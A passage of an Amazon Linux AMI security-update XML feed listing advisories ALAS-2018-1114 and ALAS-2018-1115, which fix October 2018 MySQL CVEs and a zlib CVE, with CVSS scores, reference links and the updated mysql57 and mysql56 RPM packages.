arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.7.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.5" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.5-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.7.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.7.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1114</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1114: medium priority package update for mysql57</title><issued date="2018-12-06 00:36:00" /><updated date="2018-12-07 01:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3284:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640310:
CVE-2018-3284 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3283:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Logging). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640333:
CVE-2018-3283 mysql: Server: Logging unspecified vulnerability (CPU Oct 2018)
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3278:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: RBR). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640320:
CVE-2018-3278 mysql: Server: RBR unspecified vulnerability (CPU Oct 2018)
CVE-2018-3277:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640325:
CVE-2018-3277 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640307:
CVE-2018-3276 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2018)
CVE-2018-3251:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640335:
CVE-2018-3251 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3247:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Merge). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640317:
CVE-2018-3247 mysql: Server: Merge unspecified vulnerability (CPU Oct 2018)
CVE-2018-3200:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640308:
CVE-2018-3200 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3187:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640324:
CVE-2018-3187 mysql: Server: Optimizer unspecified vulnerability (CPU Oct 2018)
CVE-2018-3185:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640337:
CVE-2018-3185 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3173:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640312:
CVE-2018-3173 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3171:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640334:
CVE-2018-3171 mysql: Server: Partition unspecified vulnerability (CPU Oct 2018)
CVE-2018-3162:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640316:
CVE-2018-3162 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3161:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640319:
CVE-2018-3161 mysql: Server: Partition unspecified vulnerability (CPU Oct 2018)
CVE-2018-3156:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640318:
CVE-2018-3156 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3155:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H).
1640340:
CVE-2018-3155 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2018-3144:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Audit). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1640326:
CVE-2018-3144 mysql: Server: Security: Audit unspecified vulnerability (CPU Oct 2018)
CVE-2018-3143:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640332:
CVE-2018-3143 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3143" title="" id="CVE-2018-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3144" title="" id="CVE-2018-3144" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3155" title="" id="CVE-2018-3155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3156" title="" id="CVE-2018-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3161" title="" id="CVE-2018-3161" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3162" title="" id="CVE-2018-3162" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3171" title="" id="CVE-2018-3171" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3173" title="" id="CVE-2018-3173" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3185" title="" id="CVE-2018-3185" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3187" title="" id="CVE-2018-3187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3200" title="" id="CVE-2018-3200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3247" title="" id="CVE-2018-3247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3251" title="" id="CVE-2018-3251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3276" title="" id="CVE-2018-3276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3277" title="" id="CVE-2018-3277" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3278" title="" id="CVE-2018-3278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3283" title="" id="CVE-2018-3283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3284" title="" id="CVE-2018-3284" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.24-1.10.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.24-1.10.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.24" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.24-1.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1115</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1115: medium priority package update for mysql56</title><issued date="2018-12-06 00:38:00" /><updated date="2018-12-07 01:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3282:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Storage Engines). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640322:
CVE-2018-3282 mysql: Server: Storage Engines unspecified vulnerability (CPU Oct 2018)
CVE-2018-3278:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: RBR). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640320:
CVE-2018-3278 mysql: Server: RBR unspecified vulnerability (CPU Oct 2018)
CVE-2018-3276:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1640307:
CVE-2018-3276 mysql: Server: Memcached unspecified vulnerability (CPU Oct 2018)
CVE-2018-3251:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640335:
CVE-2018-3251 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3247:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Merge). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1640317:
CVE-2018-3247 mysql: Server: Merge unspecified vulnerability (CPU Oct 2018)
CVE-2018-3174:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. While the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H).
1640321:
CVE-2018-3174 mysql: Init script calling kill with root privileges using pid from pidfile owned by mysql user (CPU Oct 2018)
CVE-2018-3156:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640318:
CVE-2018-3156 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3143:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640332:
CVE-2018-3143 mysql: InnoDB unspecified vulnerability (CPU Oct 2018)
CVE-2018-3133:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.5.61 and prior, 5.6.41 and prior, 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1640331:
CVE-2018-3133 mysql: Server: Parser unspecified vulnerability (CPU Oct 2018)
CVE-2016-9843:
The crc32_big function in crc32.c in zlib 1.2.8 might allow context-dependent attackers to have unspecified impact via vectors involving big-endian CRC calculation.
1402351:
CVE-2016-9843 zlib: Big-endian out-of-bounds pointer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843" title="" id="CVE-2016-9843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3133" title="" id="CVE-2018-3133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3143" title="" id="CVE-2018-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3156" title="" id="CVE-2018-3156" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174" title="" id="CVE-2018-3174" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3247" title="" id="CVE-2018-3247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3251" title="" id="CVE-2018-3251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3276" title="" id="CVE-2018-3276" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3278" title="" id="CVE-2018-3278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282" title="" id="CVE-2018-3282" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-embedded-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.42" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.42-1.31.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.42" release="1.31.amzn1" epoch="0" 